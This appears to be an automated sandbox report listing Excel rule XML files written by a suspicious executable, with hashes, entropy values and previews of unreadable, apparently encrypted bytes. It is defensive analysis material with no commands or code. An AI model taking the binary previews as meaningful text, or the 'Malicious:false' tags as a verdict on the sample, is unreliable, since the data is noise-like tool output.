                                                                                                                                                  Preview:<?xml..?~4.e..)......8i.|Y/.T.K?R./...6...L....V|~5..5.f'r?... ...IX..,..G.7....c.)....rH.......6..0.... 3.{..U;-....I.....h[.{...<.n.......p..'.m...w_4D\..A..Q...]S.....W...-...Dt.....4e.3......m.....5j..0..[#.koW.=.$.l$....p...<.]iCU...!....KdC../..L.....y..0.sOc.lNQ.F.......79...1....S.F..G..._..e....n.;#..OcH%.$k..4..).&N}...........[....-f....y G.B.]..4..9...).v..XZ.u...<.n.0ES_...UH...l....`_D.....gX......,...1.........p....NL....7...b......g..H.ux._s.48sSk....._.[=.PG.......i..i....v.hQY....?rzU...-....KY:A..}c,Q...%-...ev,..Q...........Ol..z...1.\t...KB*..;R.....Z..$..dl42..)."..8I..+o.I.W+.9.Z0....o.u..vY,U..2.<x.UG.X.Z!._&...\.1.5....I.]iZ........y.W..&.dzB(....t-I%....K.........3..H.....A:..a.m...!..q....0J...2.A@.<3./..).....J..R..N..qr#.G.p.y..j..p..\..9.G.t.'.t..S:..O@..Z...#..qfP.P.VU.P...sD...r.z.T..e-..G...Uw...B....7.....N..}...!L@.......5.|......VC...U*..vR{.....0FmD..&i=................HQPgH...Q.!./..|..P..5.V

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120402v21.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4121
                                                                                                                                                  Entropy (8bit):7.9526840731661546
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:0OOQrvSTv2+0v0BoEkWlnbQi2I8UoUAxfvKWLH8yhpFRVR8:05aviu+c0o2Miz4fv7LH8CpFh8
                                                                                                                                                  MD5:848EF41EF7B4DD759FE90E705D669036
                                                                                                                                                  SHA1:3036F5BB9CD9ABB8C199647742B4C5E2E3A8B728
                                                                                                                                                  SHA-256:41F9E802E2F936095916BB330DD1CA7817D3BCDCE82B77A4B8DE0B2A55C55B85
                                                                                                                                                  SHA-512:AEC70D8943EFE7D46127FBB72580D9E1D2D55D1316F90ADE508A7F4FA56E394C3E2A3097CD06931C5CF0F3D4E772C912E27E2B1E95EAA0635B185094018736DC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml/.S;..:U....j4I..../.(.n..e...H,..p...f...r.|r[....l..uC.sd.a..."...?..}h.@..LO.........;6k...}.G.1..}...l.}.....tMj..t.c.|.3..!.V-j%...2,..E{.v....`..g..Q.bZ.B.o.p......U...".....:...S.....Y{..`C...C`f...t....+..7?-~...[.a.....?)...L..-a[.|.A.]...w`./.G..c.A.........f...dT=o]@!/j.b...P...c...3.C.=c......&.@~/......J/...........@..}....O..PG.....b.9.rG)Z2'..h.%4e...v..g..C...4o.........4.=.O.}.f...G...z..yN..|........En.V.D(63.h..!]4..l.....'kI.].'d..M..g;..4....*h?`..?IH.K.L..&....b...w+.C.....U..R.d......;..{%....[h.\.f.Z...o.SW.%gz..l....d.i...JY...AG...#&).+q....;.".C...N..r`.#F.O.d......hI..q.6.+..3...?.$A.h...l.(i....2.i.L.P.BvR...!....j$.v...k..phklw.e.Q..K..>{w.....>F..L.e.....[.c<....W.... ..s..`*OI..<....)...YV.f.b.Y...... Q..,Q...|....#.-.q.@..=..P..OZ...Ye.m..@c4F.y.j.OH..I.Z.V*..?Y.....1.dU...a......q..T..0....T....-.s@........Z.vle..JNrDz0..... ..iD'...v...x.-(.....F.+...2....=.I._\;.F.x.f\JX,.......*.....,

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120501v17.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8140
                                                                                                                                                  Entropy (8bit):7.974960969306174
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:R97AQQHMr+GQHyh/xeLPXjyChbWaKl/Ekap1KsAVvQdI1gDeL4:RZAQQHMrqyy7yYmX2AeaqDG4
                                                                                                                                                  MD5:B459D92FAD402E0FE13338E4AD5217A5
                                                                                                                                                  SHA1:2CF65DD2F5CE13409C82099F02ABE6B9E7ABC99E
                                                                                                                                                  SHA-256:90059707D17FF566510E1CC74FF97280A39BD92015EDAC49A319C074C6529DCF
                                                                                                                                                  SHA-512:72C08396A1B4C3A233EF711C432BEE16606849B7C1E8C7334D465D7B6A47F899A0C26B1AB322D13164BE216702A8B422D4C600AEA846BB3719EB5DF59D30D153
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..$.`(..7.*..$.5...{...&..R.^J...<n=.Bd...p..D%.e#...|ny:Q.n.....0..y(/[*&...F2....f2]`..#O.....z. $.....-.=|.}.v...$......k...jP.!..-.]..u4Q..Z .3..Ts.L.... .B?.M.Q....)d.....\F.... ...Y..r..A..&_3..U..B.....e^.1.....9....w.3..^5.$.;G>)...~..)....p.qm..'q......D'.Y...NT.qEV.........n....2.....D.>9_...'.a..R...r..o...e.`..:..0.ck..q.I...Q..S.........*..k...)......VY..u.....HCSn.GF.+!...k....K...6...~Q..=(....M..1j.s.x.N/....z~...M.IA{.co.X..;..^...A........{.}^....7.Q......dM.b<....a....QK(...[.....\..Z....m.:.z..5......?....X,.?.W...qD..#8...%.e../Q.k.S..V.........!.W.......,.\-.TK.......0..>.[=......p[.#.LWnG.....F.H.75...............[1o.Z.BP.m.i...J....3..93~..s...&...r......7.r.!..2....ch..>S..s.;~..U\....Q.Z..`....$O....0vbA(.....@.,r...mB.........=...d..I....p1@..D[.E.....C..T*.B...........Z.E.^.]...~2...m]...0...9.=2.`..!...<.7...l.t..?.U.d.Q.../%...'.&..g".......?.L[.'..I.Uq. ..Jh.f.../k_`....4....K.P.M..s...B.S.G.....V....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3313
                                                                                                                                                  Entropy (8bit):7.954599918407651
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:0Kyd80EMIXcjGnaIqHJjGv5iGraMkJM8Y2O7AD0MuHO+A0BJFeeYL:I2sjGnaIqHJjGBxPiMJ2Ok2thTFDYL
                                                                                                                                                  MD5:6A8F44F73CA94B9FCD96067BFE0E97C2
                                                                                                                                                  SHA1:5E85317CF149306D1FB70616A3F3D1D6D81052E1
                                                                                                                                                  SHA-256:442C81FACF6E27AC0347995D1E51AF6485509BF76CF7904FF195D63BD8C7B853
                                                                                                                                                  SHA-512:FA0175F37935BA33173D0AEE4DE6AEE53FFB5CCAF83D3BD7BA608618E20E43C9F59135ECC4AEC3F654DFFFD679B3D349258BB5E369FAEDFB1BA2C707535A524D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..k.@t3N.....3?K...hF.f....R.......b9u.Fk....SS=.XP.g....(.i....s....YdO...^......j?...9.....T...#.....\N..e~...,.D.D..1~5...z......;cf3.&/(p.$.c.V..N..G.^....7....i.Y#..h..t..]`......'..lJQ/......XC.....O/...e{R39F.].z...oQ..[P......2.j........._G.W.......FG...v.U..~.}[.....q...m...H{....7.+..W6r..x....J.......g,.}..\.x....I.G+..SM$w3..3.....|2{..#...:I.M,7/N...??..=.[......V...a..d.s...A&d.I+W.<m...Vt{h.....2.".p-.1C.W.m.u..8.;iD..j.r[h....P..d5.X|."]......)c.Ss...b.D>..k..W,..EE8.}.!.O.....q[{..;.R.......e.B.Z...R\*..l...mprhz..).>...-x7...1.....A.\6V.g....@...n(Q.d.su[MM......$Q.?.!&......f....1=..X..E...>.....bQ.........tmU)}.g.5..w.\... 9K..........d`..a....X.?....[....A.@......._.=bKo.E...'.&I.@FZ.<.}.xx.E1.b#e .-Y...I..$......U9.QF+Z.`....f.>...E...)j.B.&.R....b>>.Pk(.dQ).....(.....SsYl.l...N<..r.z.ra.......`.f*.).y.O......7....0....L...G.u.....G$..z..wr..H...k...9..j.\.....`.........+.^.sb.<..ll.<x:1r:.7..}..:....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3675
                                                                                                                                                  Entropy (8bit):7.946102117710245
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:51FaIcQ4+gLJ5FyPu0fKkV2zAPQph7TLp72vq6UFdUng9:5YlJK3EEQfrp7J+Y
                                                                                                                                                  MD5:4D2ED11EE376BB6E7FD92F788142E3CB
                                                                                                                                                  SHA1:98F99002E6C65980D7783DAACFFA3E2CE3570EC8
                                                                                                                                                  SHA-256:6E0CEA0E965CD95AFD8AD445B563B6F8349F00443E4162B711D7F997AC734683
                                                                                                                                                  SHA-512:4094B887C8CDE9F8291A091D27BA6F293FF2F1D55C22B110D07A2DC8F20A735B84A1347007C8144BD3252378A75A7C4C37368ED47CD9C76DDA7DB3DA724B8E66
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...}.,..}....?lpt@^K.1..Rb.g..I....Ti...8....]...V.f.S......qF..P..r.$.)_qi...y{L....T.L.<)-ow...ezx.+.1Z...v.0...b.i.?.........t....U..%.h....+51|.......1"B^D{Q........x.......P...W...g*....n.._...".B &...,.,).;xr.r.Z.ob5..|.@,.<Q.-..................=_..u....u?..V^..{|..u.0....._.J.F.k..~.K!.......%=..j..N..in.....lK....doE....Az....?+....`l....X.....B[\.+.0c..6CuIo.... g.yN.+..l!$Q.,z9r..5.tl.....>..Fok.'{j.l..l\C$X.P5...Y..".5..R.?}.n$.3..oR...)......Cb..ee...A............=...*Ol.X.'.K..@..&_.M.hD..,.J ;.....T..|.msD+.R ..'........:..>.j.;..Gw!|85...j0{T...'..H..f./....Y._-d..0.t...#...l.bq\[>.....z...G..d...:G$....'.....U....z..I0__.0C....0.."...7....@w=.,....l(..!.h..M.N.L.(w....z......p.:.u.6.{.j.~..3.N......Y...j.;.6F ..|.Y.&.'Vg.......7&.#...Z.....jH./j.G..]..Vp.....\..c.r..id..%...&z%-n*..a....U-...;.;t..B..%. .B..[S^up.,_..z..{.,.#{r.i_....o.I........r.xQ.C.a....HCa[)sl..q..$$lx.L.a^ .....s'.3Z.....2.E..@..k.r

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2924
                                                                                                                                                  Entropy (8bit):7.935649022042842
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gERHGwbF1VKqDASiBbmPitt6KiomOg+XKz54ZGuk1P/takhkT/WajWbnnRnBl5eq:O01VKqDA3bmPyuoA+Xy4ZGuSP/taPWaw
                                                                                                                                                  MD5:CEAC3AA7E48CA9AA7579742ECEBF7000
                                                                                                                                                  SHA1:A341779DA618ED01CACA87382C47A2D3A5392BA7
                                                                                                                                                  SHA-256:D60B7D38DA2B28927FE8983733A88B9AFF858DAAAB840ED32DDDE4D3A6573201
                                                                                                                                                  SHA-512:931FB0ECA16F4C50BD8D4CB612AE972278B8FBDBA8338F430DF2B87D315C5B0727C3CD30B37F60675A443AFFE46F68E88AA1882E1B9538F0CCB094707B8D994F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..PvE...=NK.Y7....b.0w.q..c....S..B....Z......$/=.w.........lHo<.5.....[.(_K7.V......P.....g.4!.,.vr..xQo.8'...WA...=..$..a..._}:..w`..,SK.....n.;.W......=}.(H.L u.G..7...C3.;.T..R....}dR.}+.. .....XK....JV.T.o.(..?t.Z..7...q.I.qw.....k..f8.JJ\..V2...#.UBk..4.... R.h....6m.P.U...b."....3T}......fQK..-..+.A.V3....W....e1$c]..L..s....zm.m..z.[....y...ggl~..H.yx5j...s...W<ki9d.N. ..r4H..d_ .b.r....k...?.......L]...2*v...).~....5...1|._8[T.}3...m...?.'N.P.J`.P..K.V.....)...]...st.N...t.#.!..2.....-.<B..'.fwY8.CP.....A%...]`...hxI>.8.,p.G$..........Rz.4.(mc.^...$..J..C..M$"H..Wn:.e..eQ>F..H...s. .V ."2,x/s.;;.M.mH+0S....b.=.D...$2.^T...v.K..M9.N./%.#.Um....;D'xz..|.4;Ta........#?P...'.E...[H.F^3S...w...~....**a..7.....4..B..l...A..t........y*.)..%d...H.%...w.5*...Q..;P........R=f].2XkN.@v}@.%.....Z.?..U.M=....$....k^yJvy.`.....R._@jh.Z.j.....v......u.....8.K...I7....o...1......G{.]..N.j..|.-AL.Q/..00.....D.A.H!..L.n..l1.6.yn..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2461
                                                                                                                                                  Entropy (8bit):7.925494309547715
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:QOMla9s6zhslEaH8/MgDEwb6KOyoRPjZjM6h9gREjYD:Qs9nQHWMgDEwbey6NNbgOjE
                                                                                                                                                  MD5:A1FD2BA0C2C08A27E1A720F515547CCC
                                                                                                                                                  SHA1:AE4035330AFA9DA53A7FC02F554493FBEEAE3F7A
                                                                                                                                                  SHA-256:4FBB19AEA24C93FF8DA8FCC4016D023B4DA026C931E8EB29011CEEAA36B6FD16
                                                                                                                                                  SHA-512:3EA2ED2EDE3B77ACD7EAF2798887D69C4CB4E8BD1A8D18CE83207E5093DB4B6AE12878E6E24305F794FFAFD5F6DFB878044A08447822BDFCCD1F6B27452D9CC3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml-.I^..+.k..3^..".I.n.SG7T.Z....r.)5|.....".9......s...`..|b[%[.'...iC..>.L.........[;....i.*h..8K...u..7.)...N......b^d.....C.}..?.py..dnt1........l..c@..V..#:....8[.,..1...n...D...9.!.w.E.\..']{.7lh.ho(..g...^N.h..V...;...T..T.O.....4H..:,o"..yeH.Q..t........H..'....>......4e.Z#.2..r..?.s...._......oT...}.8.C...{d.G#.?.$5.^w.-...M#.A.I.u.c.....'.Ez..:..0&.C...D8/|/.....%....~.M~\.:../...o.~'.,...1..&.UN.+...T....q?..O..{..me.%B..KC...t..E...~}.O/.....0}.EY?E^..fJ?..?.."......y'..{Y...%z.Q.....vosJ]1o7.{...*x....T.....&F9E..U........{zK.z.e.w..%...b.~%.;.B.5.....~.)Q.' !.K......*7....6a.7U...b.waH@4.P:..4.a..{z....?....4...e..Dy.p,.s*vq.5zT...#9t.5...SL...6.<D..2.T_..I...g..l...Uj..{..o...q.K...^.....L......|.B.B"..U]...3.....B;~I&e...L.bF...N].B.`=T@S.Y.........B..)..8.Zk...{.qMsO.......m.P~.r.&S..S.c.N.....o;N=..t...Boq.K..^.......yo_..!.+...C>J.).@. E.....J....&./.Z,..N. .E...,.@.....&.d.......'.Y..M...<.. ..".*.g=I...d.`..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):758
                                                                                                                                                  Entropy (8bit):7.7005177250923165
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:2jJ0scHf0ZU5GSrdjcFTitAdf5hL8EfFdKowIPBMQCg3+cEII8qWSUdNcii9a:2jWsoVGQwTite5+MX5uhII8qV2bD
                                                                                                                                                  MD5:042226DF637BE45891ECE94841E2CFFA
                                                                                                                                                  SHA1:E2A1222B4E908CFA3470C383AD8C5C8C72A2FF57
                                                                                                                                                  SHA-256:1292407059CC42042DFC787D23CFBD920977088BC73BF49394E53D673D039A17
                                                                                                                                                  SHA-512:6C629F0AB029D41E1DED34A0133023969A44058D80D9E2838A430A1E96C50389A8E1E6D20B41C313CBE71A5425F9A135DBB34B717BF743DD98A6AB26A2C2294F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..Md8{a......|C..T.T..X...*.l....:......6...-..(.N."}n..'F.6...i....3e;....xx..$.Q.8.Z3#........^&.....|....NC;......B....w..o..7.C.D'...@.2....G.!y.P|.....E^...4....N..7<FRaW.V&..B,...2S%...[t..$.),.m...9k.hV.T.?.S@i'#.w..S..I.e..*.r+/.X*'/.q.(......`... -..%...Q.u..Tn...3....D.S.M...e..7.:..<...~..Qs.. .Yg.G...U.O[..@...t...8.....4..$^..6..>BN..v........F..W....L*....W.~.2u.B..Nm8'f0s..t.....Q...:...#.,...$;|....Fw..F.i.U..2.Y....#...iq..MM....2...$m..W...5M..W...-..u.^g..s.E.]..m..R...'G...!.......a...P7:.gm.f.......J....5U/)(..B....F.A.i..bn...-...H.,...L)Q...^....:....<.\;..q.n"^..=q....`c.{...V..s..+..@......g ~..5..t.._'{r..G.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120605v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1210
                                                                                                                                                  Entropy (8bit):7.838416547644294
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:4Jx3OZK/+dBx7ntMfGONH0fKi9lpFr7o1wQoNnoth9hM0Y3N2bD:43OZKWdfJMfXsF/vrE1wQh9h7D
                                                                                                                                                  MD5:8A62E68AB2B70F6C29951A22F22DAF7D
                                                                                                                                                  SHA1:48B3E154FB839D096037901CCB3B77DA05BD9CB4
                                                                                                                                                  SHA-256:A3C3E04992CD484A1789EF7F1D69BDBA53A1750EE6352CA943A360244E0C945B
                                                                                                                                                  SHA-512:E9F96FD56F7018987162AEB623BEB2CE2AC58501514CF600B0C632CDB3A8AE2AAD18A80E40065704796B0F6BE3BFC83BE9407ECFBE0E321D3EDE9DEDB29BF8AE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.{...r...@..}#s.gS.gC..S2.|.%.......6..)..k.o^x^....Hy....(m..4..........Tw...`.XT\...3O%1.2.....PJ]...N.......4h..<(2. .O6...GW.r.U..H.K.P..Y.....PN....l6.#%......."<.[..........#.Y...y.eX.!....<..PkC3S.....o....x.-...B...q.h.......L...f.A..c.i]..S..y.W._.0.\..".".........O[.k.4.p.)`G.Y.A./.....~...7...V./C..`O+..9...'................6w?.)......k^.....D.."I..X...[.t.....1~...+..'..xn.O..C0$....{.e..ol`.5K.qO.T9...fZT;r/.,H...Q".`..x...^...e.v.u... ...#F1..R.._E..hx.#M...YW.h1n....M....$.c+....{............cil9|..Z........caC_h...z>..e.?..y..]!....GI,.L....H&`...^2..0..0..3.\\z.j...F.6t.Y.../d...Z...."..TMn$.......y..h.Xq.B........V.v-.t3tc..T>..ev.M\.XM.m....l...M..F.`....p.."~..AQ.!y..|.7d/....H.o..FC..c.E..f).Vj4.Q9......X.....(..rl...##^<.^.oRit.:.J.4....Ljz....}..!JYp..........S!.%...*V.)ov....XLj.{0:a.g3..b?.mjQ.....>.T...3....y..Ee..{..=)W..2.{.{...`.....L....~t...|.z.a...s.D..f.Ia......Y...<..5f.rO3...0..P.s.1|K=:+/.#-..m..5..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120607v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):537
                                                                                                                                                  Entropy (8bit):7.569212725252158
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:/wVzePirZwhvuOIbeTjM5GNVI82o/lPz1lQPSUdNcii9a:4Vq8+hAzYPBv2bD
                                                                                                                                                  MD5:3F2D9F6259B3BDB49B38C96189A5DEB2
                                                                                                                                                  SHA1:FF36014F91E01B0A5985E7608525965DF23FFDB1
                                                                                                                                                  SHA-256:50DABBF214BD2B03284EF512247C5223C0F6FA38E798D7B710D24BDE571CDB82
                                                                                                                                                  SHA-512:DFAB5BAF2D093F7F96422CEF1FA6AEA500FB1C3E3A32459CC4C4F7654DFEF919E9A54772BEE55D8F15478ECDD164DD044267745871E2E787ECCD9F07EDD291FB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.s....HG....w{*l.......}..\.).LW.r.V8e.'.4+...'..m.JG..k............+..f]..r...)..-..r..h..C.f[...u...K....7....@o..6...........&..IA..'..{O...8.FxO..jE.?...Z..#b.T8...K...Y)..!:F..ra}V'L.x.q..u....H.AWB[3....G5...8.Ed.e..xkM.v.,..?......;.`..AXq.J.......{S.w.......S.!._.=.%)..O.2/.,=....;<..*....,.....p..j..e.\W.a&......Ra=.f...%gYE.M.(....8..~.;.;........+.B..l_K.2.-hC.<..G.._"....'2O.q.|.....I..%....)x.Fs.......t.Mo!..QL0s..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120608v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2493
                                                                                                                                                  Entropy (8bit):7.921574897144783
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:A46UtT8J96hY/7zI/z0gKz+I/dRVCci/0Hr9YVIbOzxnbtrDZ2bsqnID:ArUtqsY/7zI7jlI/pB5Rc/dtrDIzU
                                                                                                                                                  MD5:3C45C1B82C50F21213CB2CA1DC41F4BA
                                                                                                                                                  SHA1:369893E8F0564ED8C3587FD6C9CAD7B076DF2939
                                                                                                                                                  SHA-256:895D2400A72665B9D8EF43426A27A3E2C6CED187EFCF82EEEF84164B1CDD4375
                                                                                                                                                  SHA-512:CAFD7C7558C3DAF39119BD0D7F09679EC538F40C3B04F2AC37854CA7A8AD89BDC14FF1F361725FE348A1BCFB8CA0B4677DD9E2BD3F09BA5AAECFE9F18325F3B7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml........|.$N-Q..P..f.7....WZ...lD|....+hU$DH....\.r......a.8.....H..d.0.R}4..Jn.>....}.T87:..qY....+,...$<h.A.Z.......zP2L.e=.......z4#..5..{.../..........]..X.... VY.9!...8H.o.d.M.......U.-.ne..hY..v....&.1.. .eY.v6.`....@hwZ.h.......`Z....7....Q.#.Fk.......)].T...z.G.R........f...YM".(A..P.8.PaG..d.|.j..O%.d.!%w..C..-.6.......^^......a.S.Q.....9._.A...9b@3@(.n..6/&..$.a.v.[..!....p.\.b..C.r..].@....}..i..]I1.....mf.G.1.}&..GP..%.{.5..Z....F{..U2.p.....,.|..i'..>..4..`VN.4.........,..R....{..L..|..=.c.4..T.J...0.~".".-W.CH!..ro..E..:..6.@&....s......'.a.@A..P.G.7.......,...1...'...!...c.D.8.3B....N-@!)|..J...Z...u.c.............n$.....Gl.X...>...aU.@../....U.e:..so..J..$.h..ejZ....f..b......9......P.9......+..L~.%.....:...0..........L....#....x....);A.x.....[%.E.E.#f=M.T..%.:+..Z..N....z.?.9C..W...._.w&.."...s.F8...MPI.=.....z.9..nZU!}.gcs&n?..T.....,.,.6-F..j7aE....P....%W.l,Q.L.....6..............g.W ./..F_gZ.dWg..y"!.a..........-n56

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120609v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):741
                                                                                                                                                  Entropy (8bit):7.728288768765791
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:eSpGB2n48bSUVK3TIoFoakMxXD535XBVIpR8cdfXhwKJi2boX4/4vsMSUdNcii9a:7n48+ntkaz53ZPaycRxG2Z/T2bD
                                                                                                                                                  MD5:6320C4820CF787974809D870DC0DA5ED
                                                                                                                                                  SHA1:918F073C73D54B438C4B1AB858F7D988695FCE5F
                                                                                                                                                  SHA-256:3EEEEC9A58E657E1426A6C9BB2F00F8DA2FA267798495DFFBAAA7F69F0DCB319
                                                                                                                                                  SHA-512:305C38A23F049DA828DED4EB75AEECC9F36A5D8E44184AD1A3858BEEA774729C5737815DA88FE2FD3AE90CE8E2AF6DD0A4DF9B7C6382B6DF765238E4B45DD4B1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmljBi...I....OO.....T...h/(.[Kz...XE[...A.m.v..."!..o}+...C.y....9.=R.b...I.......#.c..'.....H!*.V.....&T........8...,].udx.Y.+...'G.Z.\jd.x.\m@.....v.#-.w..3..#J=m...R#...NU.i..8c..N..d.....$mZ.i....p..|0.?<.p..c.oH[..^\..A...\.`y.N....b..F.e.#...EA#.s..Ph.....d.`Yc.@K.^.$.^...L.Q....O.D...^..T.A.D.......^.Mt..B.]>...K.G.....<..M4.W,.y_..}..[...N.dT.x...i~.{.9a.t.t..$....7.]..+wC.G...v..e-&)."K.8.I....E........pL.....m.....F4.c.2.r.....v...E..k....St..P...Rv.....r~&qa..|.#U.JY.=..'.......>]%.......^*zf{I..1.A....zhG..@.,.h)|.....P..P=..eISi..[d..........).....z!@...l...C.&.b....k.5...`O..*...8]..]s.h.R..Z.k..2.........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120610v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.755414858758445
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:lGcCdrANDpZSTic/iK+NNbXUE6lHXuW4i9t2bD:lYoDTSTbiK+NH6N+LD
                                                                                                                                                  MD5:0E2E6CFF8CD2E352E5E1E74143F77A26
                                                                                                                                                  SHA1:0EE466A5ED16B670BE23783F29A082BCA8123CA6
                                                                                                                                                  SHA-256:B65C695A797283E312FC00F925B2DC5F983C5DE5296F94135DD47631B716A2A2
                                                                                                                                                  SHA-512:24F9FE719076B5F340DD9119BAD20DEDF087C779427E92E672DB85072144A07D6105EC3B28D85D5517737A77A4836BF7E6047A78C0067553BB712CB02EFD887E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.x..-..C.j....4k...JD1.../...tP.(....J.W..b..0B.I..bT...x.-..5I....S.........^....lkF^...!...|b...o..x.....GRj||P....w....Yr.q...P..F.h..|.@(....~.A.M....,..]=.V...?,...p$.c.-.S....O.....K...c@3..t.e+@....7.N....6...X....eL.u.n"[.......t)}D.s...q.....Gf.y....:.........W.o.K.'n.|.v.YP.PEm....z.SD*O...v.:..r..r....Rn.5."[...$2....&f.9`L.b.K.h.?....)b....3.7*..}.....A....cqE&3....:i..e....yE..y. .....G.#cO........;..XM>.*..j<t......k'$~.e`.P&.V..p.........._H.pk.0....a......k.m...t.._$>s.....@.'..%..%..n}Bm..}.s...i..2M..............x..~x..r.....i#;.Bp...o....N@.<.o.........[?)........0g.e...t.IraF.`..p...<c.f.IS...v..y-.....2....1e M......s...Sd=f. ....."6..{jAU.....}.5mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120611v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):748
                                                                                                                                                  Entropy (8bit):7.699521531554023
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:UjCs/lcIcgQx4p4xWMvGZDAGVBIlBPECW7XcMoBiohPRLohiuWuu9h9iWoozSUdV:q6I/Qx4pXMvGZsoBB+iohPRc0uWuuTEk
                                                                                                                                                  MD5:93A12C615B693E5C997E97BDFC43CC0A
                                                                                                                                                  SHA1:A00C3B6F16212B316C095D1762FD15207F0B3A4E
                                                                                                                                                  SHA-256:2611D4BFA2D28510DF85DC3C8F36B670E7F9EA7AA3CE995CF38B9F98CFCE7688
